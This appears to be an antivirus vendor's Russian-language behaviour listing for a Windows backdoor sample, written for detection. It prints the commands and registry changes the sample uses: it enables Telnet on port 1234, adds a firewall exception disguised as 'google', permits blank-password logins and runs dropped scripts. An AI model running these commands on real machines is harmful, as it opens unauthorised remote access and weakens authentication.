Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\tlntsvr.exe' = '<SYSTEM32>\tlntsvr.exe:*:Enabled:google'
- '<SYSTEM32>\net1.exe' start telnet
- '<SYSTEM32>\sc.exe' config tlntsvr start= auto
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
- '<SYSTEM32>\tlntsvr.exe'
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram <SYSTEM32>\tlntsvr.exe google enable
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\ok.bat" "
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\telnet.vbs"
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0 /v TelnetPort /t REG_DWORD /d 1234 /f
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v limitblankpassworduse /t REG_DWORD /f
- <Текущая директория>\telnet.vbs
- <Текущая директория>\ok.bat
- <Текущая директория>\telnet.vbs
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'